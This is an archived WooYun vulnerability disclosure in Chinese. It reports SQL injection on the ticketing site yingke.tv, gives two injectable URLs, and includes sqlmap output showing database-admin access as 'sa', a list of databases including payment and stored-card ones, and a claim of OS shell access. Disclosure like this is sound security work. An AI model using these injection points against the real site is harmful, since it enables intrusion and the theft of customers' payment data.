乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-14: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
RT
====影客票务网主站存在sql注入漏洞===注入点
http://www.yingke.tv/Shop/ShopDetail.aspx?id=1103
http://www.yingke.tv/NewsList.aspx?cityid=11&type=1
两个参数均存在注入
[13:58:07] [INFO] testing Microsoft SQL Server[13:58:07] [INFO] confirming Microsoft SQL Server[13:58:08] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[13:58:08] [INFO] fetching current user[13:58:08] [INFO] retrieved: sacurrent user: 'sa'
[14:00:26] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[14:00:26] [INFO] testing if current user is DBA[14:00:26] [INFO] retrieved: 1current user is DBA: 'True'
available databases [12]:[*] EasyPay[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] Test[*] WeiXinDataBase[*] YingKeData[*] YingKeDataTest[*] YKStoredCard
可以os-shell
未能联系到厂商或者厂商积极拒绝